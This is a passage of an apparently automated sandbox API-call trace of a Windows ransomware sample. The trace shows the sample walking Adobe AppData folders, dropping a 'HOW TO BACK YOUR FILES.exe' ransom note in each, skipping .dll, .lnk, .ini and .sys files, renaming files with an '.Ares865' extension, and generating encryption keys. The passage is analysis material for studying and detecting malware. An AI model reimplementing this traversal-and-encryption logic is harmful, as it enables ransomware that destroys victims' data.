HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan" [0110.797] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.797] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\dan\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.798] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.798] GetLastError () returned 0x0 [0110.798] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.798] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.798] CloseHandle (hObject=0x120) returned 1 [0110.799] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.799] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d78d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d78d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.799] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.799] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.799] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz" [0110.799] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz" [0110.799] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.799] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\brz\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.800] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.800] GetLastError () returned 0x0 [0110.800] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.800] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.800] CloseHandle (hObject=0x120) returned 1 [0110.801] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.801] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d9ee60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d9ee60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.801] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.801] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.801] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt" [0110.801] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt" [0110.801] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.801] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\brt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.802] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.802] GetLastError () returned 0x0 [0110.802] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.802] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.803] CloseHandle (hObject=0x120) returned 1 [0110.803] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.803] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d9ee60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d9ee60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.803] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.803] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.803] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all" [0110.803] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all" [0110.804] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.804] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\all\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.804] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.804] GetLastError () returned 0x0 [0110.805] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.805] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.805] CloseHandle (hObject=0x120) returned 1 [0110.805] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.805] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d9ee60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d9ee60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.805] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.805] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.806] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat" [0110.806] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat" [0110.806] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.806] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.806] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.807] GetLastError () returned 0x0 [0110.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.807] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.807] CloseHandle (hObject=0x120) returned 1 [0110.807] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.807] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x50d9ee60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d9ee60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.807] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.807] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.808] lstrcpyW (in: lpString1=0x2cce47a, lpString2="10.0" | out: lpString1="10.0") returned="10.0" [0110.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0110.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x84) returned 0x2e95b0 [0110.808] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0110.808] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50d9ee60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x50d9ee60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0110.808] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0110.808] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50d9ee60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x50d9ee60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0110.808] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0110.808] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7990 [0110.808] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0" [0110.808] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0" [0110.808] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.808] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.809] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.809] GetLastError () returned 0x0 [0110.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.809] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.809] CloseHandle (hObject=0x120) returned 1 [0110.810] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.810] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x50dc4fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50dc4fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.810] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.810] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.810] lstrcpyW (in: lpString1=0x2cce484, lpString2="rdrmessage.zip.Ares865" | out: lpString1="rdrmessage.zip.Ares865") returned="rdrmessage.zip.Ares865" [0110.810] lstrlenW (lpString="rdrmessage.zip.Ares865") returned 22 [0110.810] lstrlenW (lpString="Ares865") returned 7 [0110.810] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.810] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce824760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce824760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe5ab8070, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReaderMessages", cAlternateFileName="READER~1")) returned 1 [0110.810] lstrcmpiW (lpString1="ReaderMessages", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0110.810] lstrcmpiW (lpString1="ReaderMessages", lpString2="aoldtz.exe") returned 1 [0110.810] lstrcpyW (in: lpString1=0x2cce484, lpString2="ReaderMessages" | out: lpString1="ReaderMessages") returned="ReaderMessages" [0110.810] lstrlenW (lpString="ReaderMessages") returned 14 [0110.810] lstrlenW (lpString="Ares865") returned 7 [0110.810] lstrcmpiW (lpString1="essages", lpString2="Ares865") returned 1 [0110.810] lstrlenW (lpString=".dll") returned 4 [0110.810] lstrcmpiW (lpString1="ReaderMessages", lpString2=".dll") returned 1 [0110.810] lstrlenW (lpString=".lnk") returned 4 [0110.811] lstrcmpiW (lpString1="ReaderMessages", lpString2=".lnk") returned 1 [0110.811] lstrlenW (lpString=".ini") returned 4 [0110.811] lstrcmpiW (lpString1="ReaderMessages", lpString2=".ini") returned 1 [0110.811] lstrlenW (lpString=".sys") returned 4 [0110.811] lstrcmpiW (lpString1="ReaderMessages", lpString2=".sys") returned 1 [0110.811] lstrlenW (lpString="ReaderMessages") returned 14 [0110.811] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages.Ares865") returned 88 [0110.811] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages.ares865"), dwFlags=0x1) returned 1 [0110.817] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.817] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0110.817] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.817] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0110.817] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.817] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.818] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.818] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.824] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.825] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.825] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.826] lstrcpyW (in: lpString1=0x2cce484, lpString2="Search" | out: lpString1="Search") returned="Search" [0110.826] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0110.826] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x92) returned 0x334fc8 [0110.826] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0110.826] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50dc4fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50dc4fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 0 [0110.826] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0110.826] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7990 [0110.826] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search") returned="C:\\Users\\5p5NrGJn0jS 